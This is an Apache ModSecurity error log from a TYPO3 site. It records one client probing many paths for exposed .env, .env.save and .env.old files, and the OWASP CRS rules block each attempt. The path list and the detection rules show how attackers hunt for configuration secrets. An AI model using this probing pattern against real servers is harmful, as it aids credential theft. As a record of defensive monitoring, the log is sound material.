[Sun Nov 16 12:39:21.151964 2025] [:error] [pid 107792] [client 3.8.102.89:49086] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.old"] [unique_id "aRm36e0VDMccOZESIOBvtwAAAAA"]
[Sun Nov 16 12:39:21.168526 2025] [:error] [pid 111778] [client 3.8.102.89:49080] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aRm36R7OFadbAiGPfqkqzgAAAAI"]
[Sun Nov 16 12:39:21.168730 2025] [:error] [pid 111778] [client 3.8.102.89:49080] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aRm36R7OFadbAiGPfqkqzgAAAAI"]
[Sun Nov 16 12:39:21.168906 2025] [:error] [pid 111778] [client 3.8.102.89:49080] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env.save"] [unique_id "aRm36R7OFadbAiGPfqkqzgAAAAI"]
[Sun Nov 16 12:39:22.424643 2025] [:error] [pid 113283] [client 3.8.102.89:49110] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aRm36g0D7yRPJp9gclT4iQAAAAM"]
[Sun Nov 16 12:39:22.424860 2025] [:error] [pid 113283] [client 3.8.102.89:49110] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aRm36g0D7yRPJp9gclT4iQAAAAM"]
[Sun Nov 16 12:39:22.425022 2025] [:error] [pid 113283] [client 3.8.102.89:49110] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aRm36g0D7yRPJp9gclT4iQAAAAM"]
[Sun Nov 16 12:39:22.427210 2025] [:error] [pid 113296] [client 3.8.102.89:49130] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aRm36v7nuvXY8JVEGWXChAAAAA8"]
[Sun Nov 16 12:39:22.427249 2025] [:error] [pid 113290] [client 3.8.102.89:49104] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRm36n9I9DIP5OQurvpqlQAAAAQ"]
[Sun Nov 16 12:39:22.427397 2025] [:error] [pid 113290] [client 3.8.102.89:49104] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRm36n9I9DIP5OQurvpqlQAAAAQ"]
[Sun Nov 16 12:39:22.427417 2025] [:error] [pid 113296] [client 3.8.102.89:49130] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aRm36v7nuvXY8JVEGWXChAAAAA8"]
[Sun Nov 16 12:39:22.427591 2025] [:error] [pid 113296] [client 3.8.102.89:49130] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env"] [unique_id "aRm36v7nuvXY8JVEGWXChAAAAA8"]
[Sun Nov 16 12:39:22.427594 2025] [:error] [pid 113290] [client 3.8.102.89:49104] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRm36n9I9DIP5OQurvpqlQAAAAQ"]
[Sun Nov 16 12:39:22.427744 2025] [:error] [pid 113290] [client 3.8.102.89:49104] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.old"] [unique_id "aRm36n9I9DIP5OQurvpqlQAAAAQ"]
[Sun Nov 16 12:39:22.430758 2025] [authz_core:error] [pid 113276] [client 3.8.102.89:49118] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application
[Sun Nov 16 12:39:30.745048 2025] [:error] [pid 107823] [client 3.8.102.89:56226] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aRm38mZlvYqdbt58w-ZoRgAAABA"]
[Sun Nov 16 12:39:30.745266 2025] [:error] [pid 107823] [client 3.8.102.89:56226] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aRm38mZlvYqdbt58w-ZoRgAAABA"]
[Sun Nov 16 12:39:30.745451 2025] [:error] [pid 107823] [client 3.8.102.89:56226] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.save"] [unique_id "aRm38mZlvYqdbt58w-ZoRgAAABA"]
[Sun Nov 16 12:39:30.806764 2025] [:error] [pid 107792] [client 3.8.102.89:56238] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aRm38u0VDMccOZESIOBvuAAAAAA"]
[Sun Nov 16 12:39:30.806994 2025] [:error] [pid 107792] [client 3.8.102.89:56238] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aRm38u0VDMccOZESIOBvuAAAAAA"]
[Sun Nov 16 12:39:30.807176 2025] [:error] [pid 107792] [client 3.8.102.89:56238] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aRm38u0VDMccOZESIOBvuAAAAAA"]
[Sun Nov 16 12:39:30.807574 2025] [authz_core:error] [pid 113274] [client 3.8.102.89:56262] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/system
[Sun Nov 16 12:39:30.808897 2025] [:error] [pid 107814] [client 3.8.102.89:56276] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRm38oYUzNZoYnjqey4--wAAAAc"]
[Sun Nov 16 12:39:30.809048 2025] [:error] [pid 107814] [client 3.8.102.89:56276] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRm38oYUzNZoYnjqey4--wAAAAc"]
[Sun Nov 16 12:39:30.809231 2025] [:error] [pid 107814] [client 3.8.102.89:56276] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRm38oYUzNZoYnjqey4--wAAAAc"]
[Sun Nov 16 12:39:30.809393 2025] [:error] [pid 107814] [client 3.8.102.89:56276] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aRm38oYUzNZoYnjqey4--wAAAAc"]
[Sun Nov 16 12:39:30.810057 2025] [:error] [pid 106377] [client 3.8.102.89:56230] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRm38s1A9uIKv4_seqC0YwAAAA4"]
[Sun Nov 16 12:39:30.810235 2025] [:error] [pid 106377] [client 3.8.102.89:56230] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRm38s1A9uIKv4_seqC0YwAAAA4"]
[Sun Nov 16 12:39:30.810398 2025] [:error] [pid 106377] [client 3.8.102.89:56230] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRm38s1A9uIKv4_seqC0YwAAAA4"]
[Sun Nov 16 12:39:30.839704 2025] [:error] [pid 111778] [client 3.8.102.89:56234] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aRm38h7OFadbAiGPfqkqzwAAAAI"]
[Sun Nov 16 12:39:30.839899 2025] [:error] [pid 111778] [client 3.8.102.89:56234] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aRm38h7OFadbAiGPfqkqzwAAAAI"]
[Sun Nov 16 12:39:30.840070 2025] [:error] [pid 111778] [client 3.8.102.89:56234] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aRm38h7OFadbAiGPfqkqzwAAAAI"]
[Sun Nov 16 12:39:30.849853 2025] [authz_core:error] [pid 113276] [client 3.8.102.89:56286] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core
[Sun Nov 16 12:39:30.850116 2025] [:error] [pid 113290] [client 3.8.102.89:56246] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRm38n9I9DIP5OQurvpqlgAAAAQ"]
[Sun Nov 16 12:39:30.850275 2025] [:error] [pid 113290] [client 3.8.102.89:56246] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRm38n9I9DIP5OQurvpqlgAAAAQ"]
[Sun Nov 16 12:39:30.850468 2025] [:error] [pid 113290] [client 3.8.102.89:56246] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRm38n9I9DIP5OQurvpqlgAAAAQ"]
[Sun Nov 16 12:39:30.850651 2025] [:error] [pid 113290] [client 3.8.102.89:56246] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aRm38n9I9DIP5OQurvpqlgAAAAQ"]
[Sun Nov 16 12:39:30.874554 2025] [:error] [pid 113296] [client 3.8.102.89:56288] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aRm38v7nuvXY8JVEGWXChQAAAA8"]
[Sun Nov 16 12:39:30.874763 2025] [:error] [pid 113296] [client 3.8.102.89:56288] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aRm38v7nuvXY8JVEGWXChQAAAA8"]
[Sun Nov 16 12:39:30.874940 2025] [:error] [pid 113296] [client 3.8.102.89:56288] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aRm38v7nuvXY8JVEGWXChQAAAA8"]
